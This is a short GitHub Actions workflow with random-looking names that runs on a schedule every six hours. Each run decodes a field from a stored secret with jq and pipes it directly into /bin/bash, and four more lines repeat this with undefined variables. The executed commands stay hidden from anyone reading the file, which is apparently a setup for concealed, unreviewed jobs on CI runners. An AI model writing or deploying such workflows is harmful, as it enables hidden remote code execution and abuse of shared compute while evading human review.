name: blurtinfested
on:
  workflow_dispatch:
  schedule:
    - cron: '26 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: blurtinfested
        env:
          kdwzm33494: ${{ secrets.kdwzm33494 }}
        run: |
          echo $kdwzm33494 | jq -r .ofzkx74621 | /bin/bash
          echo $scjj65375 | jq -r .iyjx9412 | /bin/bash
          echo $rkef4 | jq -r .a93 | /bin/bash
          echo $btgip9517 | jq -r .vmpt51 | /bin/bash
          echo $pqh188 | jq -r .lv6259 | /bin/bash

